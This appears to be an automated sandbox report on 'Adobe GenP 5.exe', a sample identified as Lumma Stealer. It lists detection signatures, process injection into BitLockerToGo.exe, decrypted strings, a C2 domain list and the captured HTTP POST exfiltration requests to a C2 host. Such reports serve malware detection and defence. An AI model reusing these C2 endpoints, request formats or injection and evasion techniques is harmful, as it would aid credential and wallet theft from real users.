Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Adobe GenP 5.exe

Overview

General Information

Sample name:Adobe GenP 5.exe
Analysis ID:1580154
MD5:9cce9d11869e1568a959515cd688f1f9
SHA1:98e048ba68a2aa5b2640f768dea8a6c6a4eb060c
SHA256:8a83820f2b3d79812bf39f4171d7d70d44b4d7a137c0aa1603f7e195dfc5210f
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Adobe GenP 5.exe (PID: 6000 cmdline: "C:\Users\user\Desktop\Adobe GenP 5.exe" MD5: 9CCE9D11869E1568A959515CD688F1F9)
    • BitLockerToGo.exe (PID: 5448 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["rapeflowwj.lat", "necklacebudi.lat", "grannyejh.lat", "discokeyus.lat", "icyidentifysu.click", "energyaffai.lat", "crosshuaht.lat", "aspecteirs.lat", "sustainskelet.lat"], "Build id": "LPnhqo--iycpjnafscfz"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2310216915.000000000AE80000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
      • 0x0:$x1: 4d5a9000030000000
      00000000.00000002.2310776898.000000000B000000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
      • 0x0:$x1: 4d5a9000030000000
      Process Memory Space: BitLockerToGo.exe PID: 5448JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: BitLockerToGo.exe PID: 5448JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: BitLockerToGo.exe PID: 5448JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            Click to see the 1 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T02:56:31.907057+010020283713Unknown Traffic192.168.2.549725104.21.29.252443TCP
            2024-12-24T02:56:34.245323+010020283713Unknown Traffic192.168.2.549736104.21.29.252443TCP
            2024-12-24T02:56:36.612569+010020283713Unknown Traffic192.168.2.549742104.21.29.252443TCP
            2024-12-24T02:56:39.234144+010020283713Unknown Traffic192.168.2.549748104.21.29.252443TCP
            2024-12-24T02:56:43.540784+010020283713Unknown Traffic192.168.2.549759104.21.29.252443TCP
            2024-12-24T02:56:46.356781+010020283713Unknown Traffic192.168.2.549765104.21.29.252443TCP
            2024-12-24T02:56:48.876162+010020283713Unknown Traffic192.168.2.549771104.21.29.252443TCP
            2024-12-24T02:56:52.541408+010020283713Unknown Traffic192.168.2.549781104.21.29.252443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T02:56:33.011243+010020546531A Network Trojan was detected192.168.2.549725104.21.29.252443TCP
            2024-12-24T02:56:35.029159+010020546531A Network Trojan was detected192.168.2.549736104.21.29.252443TCP
            2024-12-24T02:57:00.470768+010020546531A Network Trojan was detected192.168.2.549781104.21.29.252443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T02:56:33.011243+010020498361A Network Trojan was detected192.168.2.549725104.21.29.252443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T02:56:35.029159+010020498121A Network Trojan was detected192.168.2.549736104.21.29.252443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T02:56:37.510301+010020480941Malware Command and Control Activity Detected192.168.2.549742104.21.29.252443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://icyidentifysu.click/Avira URL Cloud: Label: malware
            Source: https://icyidentifysu.click/8NrAvira URL Cloud: Label: malware
            Source: https://icyidentifysu.click/ck/8NrAvira URL Cloud: Label: malware
            Source: https://icyidentifysu.click/nFAvira URL Cloud: Label: malware
            Source: https://icyidentifysu.click/YFAvira URL Cloud: Label: malware
            Source: https://icyidentifysu.click/pivAvira URL Cloud: Label: malware
            Source: https://icyidentifysu.click/piAvira URL Cloud: Label: malware
            Source: https://icyidentifysu.click:443/apiAvira URL Cloud: Label: malware
            Source: icyidentifysu.clickAvira URL Cloud: Label: malware
            Source: https://icyidentifysu.click/apiAvira URL Cloud: Label: malware
            Source: 3.2.BitLockerToGo.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["rapeflowwj.lat", "necklacebudi.lat", "grannyejh.lat", "discokeyus.lat", "icyidentifysu.click", "energyaffai.lat", "crosshuaht.lat", "aspecteirs.lat", "sustainskelet.lat"], "Build id": "LPnhqo--iycpjnafscfz"}
            Source: Adobe GenP 5.exeVirustotal: Detection: 37%Perma Link
            Source: Adobe GenP 5.exeReversingLabs: Detection: 44%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: 00000003.00000002.2609837960.000000000043E000.00000040.00000400.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
            Source: 00000003.00000002.2609837960.000000000043E000.00000040.00000400.00020000.00000000.sdmpString decryptor: crosshuaht.lat
            Source: 00000003.00000002.2609837960.000000000043E000.00000040.00000400.00020000.00000000.sdmpString decryptor: sustainskelet.lat
            Source: 00000003.00000002.2609837960.000000000043E000.00000040.00000400.00020000.00000000.sdmpString decryptor: aspecteirs.lat
            Source: 00000003.00000002.2609837960.000000000043E000.00000040.00000400.00020000.00000000.sdmpString decryptor: energyaffai.lat
            Source: 00000003.00000002.2609837960.000000000043E000.00000040.00000400.00020000.00000000.sdmpString decryptor: necklacebudi.lat
            Source: 00000003.00000002.2609837960.000000000043E000.00000040.00000400.00020000.00000000.sdmpString decryptor: discokeyus.lat
            Source: 00000003.00000002.2609837960.000000000043E000.00000040.00000400.00020000.00000000.sdmpString decryptor: grannyejh.lat
            Source: 00000003.00000002.2609837960.000000000043E000.00000040.00000400.00020000.00000000.sdmpString decryptor: icyidentifysu.click
            Source: 00000003.00000002.2609837960.000000000043E000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000003.00000002.2609837960.000000000043E000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000003.00000002.2609837960.000000000043E000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 00000003.00000002.2609837960.000000000043E000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000003.00000002.2609837960.000000000043E000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 00000003.00000002.2609837960.000000000043E000.00000040.00000400.00020000.00000000.sdmpString decryptor: LPnhqo--iycpjnafscfz
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00416D93 CryptUnprotectData,3_2_00416D93
            Source: Adobe GenP 5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
            Source: unknownHTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.5:49725 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.5:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.5:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.5:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.5:49759 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.5:49765 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.5:49771 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.5:49781 version: TLS 1.2
            Source: Adobe GenP 5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: BitLockerToGo.pdb source: Adobe GenP 5.exe, 00000000.00000003.2243124589.000000000B168000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: BitLockerToGo.pdbGCTL source: Adobe GenP 5.exe, 00000000.00000003.2243124589.000000000B168000.00000004.00001000.00020000.00000000.sdmp
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [esi], al3_2_0042A03C
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [eax], bl3_2_0040E2D5
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi+2B788957h]3_2_0040E2D5
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-5C2FB1A1h]3_2_0040C37A
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 5E874B5Fh3_2_004253A0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, ebx3_2_004253A0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, edx3_2_0043C410
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [ebp+eax-10h]3_2_0043A55A
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042A749
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042A749
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, eax3_2_0042B771
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, ecx3_2_0042A80B
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, eax3_2_0042A80B
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edx+ebx*8], AF697AECh3_2_00439BE8
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edx-5A3E0FADh]3_2_0043CCD0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+00000120h]3_2_0040DCA0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E1A2961Bh3_2_00439F2D
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h3_2_00429070
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, eax3_2_0042B0DE
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esi]3_2_0042B0DE
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, eax3_2_00429E89
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esi]3_2_00429E89
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]3_2_00439140
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h3_2_00422154
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h3_2_004221FE
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebx+06h]3_2_00409270
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push esi3_2_00420273
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push A0E75166h3_2_0040B215
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebp, byte ptr [esp+ecx+38h]3_2_0040C2DA
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, ebx3_2_004282E8
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68C964F4h]3_2_0041B2AA
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esi], 97969554h3_2_0043A35B
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh3_2_00424330
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx3_2_004153FC
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, word ptr [ebx+eax]3_2_00421380
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+06h]3_2_00421380
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then lea esi, dword ptr [eax-01h]3_2_00419490
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then lea esi, dword ptr [eax-01h]3_2_00419490
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then lea esi, dword ptr [eax-01h]3_2_00419490
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_2_004074A0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_004074A0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax3_2_004245DE
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0042760C
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-6Ah]3_2_00438620
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+181AFBA5h]3_2_00409630
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-654B9280h]3_2_00409630
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebp+00h], al3_2_0041D6F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]3_2_004256A0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00432770
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, word ptr [ebp+00h]3_2_00436770
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-3A16D4AFh]3_2_0043B720
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, ecx3_2_0040C830
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+000003B2h]3_2_004298A0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, eax3_2_00405940
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebp, eax3_2_00405940
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [ebp+00h]3_2_004029D0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h3_2_004389F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], A2347758h3_2_004389F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, edi3_2_0041CA40
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then lea edx, dword ptr [eax+00000270h]3_2_00408A50
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_00428AF0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-00000085h]3_2_00418BE7
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh3_2_00426B8E
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], E785F9BAh3_2_00414C4E
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0041AC1D
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+00000120h]3_2_0040CCC5
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [esi], cx3_2_00417CE5
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [ecx]3_2_00415CFC
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], E785F9BAh3_2_00414D45
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, ebx3_2_00427D4D
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], E785F9BAh3_2_00427D4D
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [esi+ecx+48EF6323h]3_2_00439DD7
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then test eax, eax3_2_00435E40
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then add ecx, FFFFFFFEh3_2_00435E40
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], E785F9BAh3_2_00414D40
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, eax3_2_00429ECA
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esi]3_2_00429ECA
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]3_2_00402F40
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx3_2_00422F44
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 4E935B1Fh3_2_00421F0E
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 4E935B1Fh3_2_00421F10
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], bl3_2_00408FE0

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49725 -> 104.21.29.252:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49725 -> 104.21.29.252:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49736 -> 104.21.29.252:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49736 -> 104.21.29.252:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49742 -> 104.21.29.252:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49781 -> 104.21.29.252:443
            Source: Malware configuration extractorURLs: rapeflowwj.lat
            Source: Malware configuration extractorURLs: necklacebudi.lat
            Source: Malware configuration extractorURLs: grannyejh.lat
            Source: Malware configuration extractorURLs: discokeyus.lat
            Source: Malware configuration extractorURLs: icyidentifysu.click
            Source: Malware configuration extractorURLs: energyaffai.lat
            Source: Malware configuration extractorURLs: crosshuaht.lat
            Source: Malware configuration extractorURLs: aspecteirs.lat
            Source: Malware configuration extractorURLs: sustainskelet.lat
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49765 -> 104.21.29.252:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49771 -> 104.21.29.252:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49736 -> 104.21.29.252:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49742 -> 104.21.29.252:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49748 -> 104.21.29.252:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49759 -> 104.21.29.252:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49725 -> 104.21.29.252:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49781 -> 104.21.29.252:443
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: icyidentifysu.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: icyidentifysu.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=N3WY1YHRYDYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12800Host: icyidentifysu.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=J8WBJ6Q0JD8R2EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15060Host: icyidentifysu.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=B441WSEU0FABEAHWCEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20574Host: icyidentifysu.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0OLTCBLHL669ZO1XSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1251Host: icyidentifysu.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=E05V38MADA0V3M1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 592557Host: icyidentifysu.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: icyidentifysu.click
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: icyidentifysu.click
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: icyidentifysu.click
            Source: BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
